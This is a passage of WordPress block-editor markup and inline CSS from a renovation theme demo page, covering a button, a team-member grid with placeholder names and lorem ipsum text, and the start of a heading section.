class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"3ae9a34b-e7e2-43ff-99a6-51ffbdeca952\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\" rel=\"noopener noreferrer\" target=\"_blank\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"62981b50-3c5d-444e-bb72-92934717d974\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-62981b50-3c5d-444e-bb72-92934717d974 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-62981b50-3c5d-444e-bb72-92934717d974.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-62981b50-3c5d-444e-bb72-92934717d974 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-62981b50-3c5d-444e-bb72-92934717d974.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2ed0dd46-9fb3-4e5b-a467-914055e0db1a\"} -->\n<style type=\"text/css\"> .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2ed0dd46-9fb3-4e5b-a467-914055e0db1a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"3cba6fdd-d953-4ef9-8801-a52205e92af1\"} -->\n<style type=\"text/css\"> .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3cba6fdd-d953-4ef9-8801-a52205e92af1 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3cba6fdd-d953-4ef9-8801-a52205e92af1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ac4f996e-c6b4-4837-bf52-6ec14496e971\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ac4f996e-c6b4-4837-bf52-6ec14496e971 .responsive-heading-desc-text {\n margin-bottom: 